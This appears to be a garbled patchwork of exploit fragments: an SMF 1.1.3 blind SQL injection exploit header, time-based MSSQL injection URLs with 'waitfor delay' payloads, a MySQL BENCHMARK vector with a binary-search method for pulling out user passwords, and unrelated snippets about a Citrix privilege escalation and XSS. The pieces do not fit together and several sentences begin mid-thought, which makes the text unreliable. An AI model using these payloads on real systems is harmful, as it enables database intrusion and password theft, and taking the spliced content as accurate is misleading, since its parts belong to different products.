#Written By Michael Brooks
#contact: th3(dot)r00k(at)gmail(dot)com
#SMF 1.1.3 Extremely fast Blind SQL Injection Exploit!
# -Binary Search
# -Multi-Threaded
# -NO benchmark()'s
#
#Two SQL Injection flaws.
#Works with magic_quotes_gpc=On or Off.
http://[URL]/archive.aspx?sid=19&siteid=1'; IF SYSTEM_USER='sa' waitfor delay '00:00:10'--
http://[URL]/archive.aspx?sid=19'; IF SYSTEM_USER='sa' waitfor delay '00:00:10'--&siteid=1
Binary Search Exploits:
http://[URL]/about.aspx?siteid=1'; IF ASCII(SUBSTRING((…),i,1)) > k waitfor delay '00:00:10'--
Note: In the last POC, i is the index of the i-th byte returned by the one-row subquery (…) and k is the current middle value of the binary search.
workaround for MetaFrame XP, because Windows 2003 SP1 no longer allows startup via the RUN registry key without a full path.
However, this patch from Citrix doesn't quote the full binary path stored in the RUN registry key, so an attacker can abuse the old 8.3 notation in the binary search, and consequently this can be used to escalate privileges in some circumstances.
V. DETECTION:
admin' AND IF(@Condition,BENCHMARK(1000000, md5(10)),2) OR '1'='1
In the above vector, @Condition can be replaced with any boolean expression; when it evaluates to true, the page will show a noticeable delay before the transfer phase starts.
To extract the password, we first find the password length using 'length(userpassword)>**' as @Condition and a binary search on ** (the password length).
Then we can find the i-th character of the password using "substring(userpassword,i,1) > '*'" as @Condition and a binary search on * over the character range.
enters a program, and if you sanitize input when it first enters the program there will be cases where it becomes dangerous again. This isn't only a problem for SQLi; it's also a problem for XSS. I am inserting JS into the database, which isn't a vulnerability, but printing it is persistent XSS.
The blind SQL injection is a bit strange: I can't use white space or commas, which is a pain. I had to rewrite my general-purpose blind SQLi class to accommodate this. A binary search is used to greatly speed up the blind SQLi attack.
(which I also used in my php-nuke exploit: http://www.exploit-db.com/exploits/12510/)
Special thanks to Reiners for this sqli filter evasion cheat sheet:
http://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/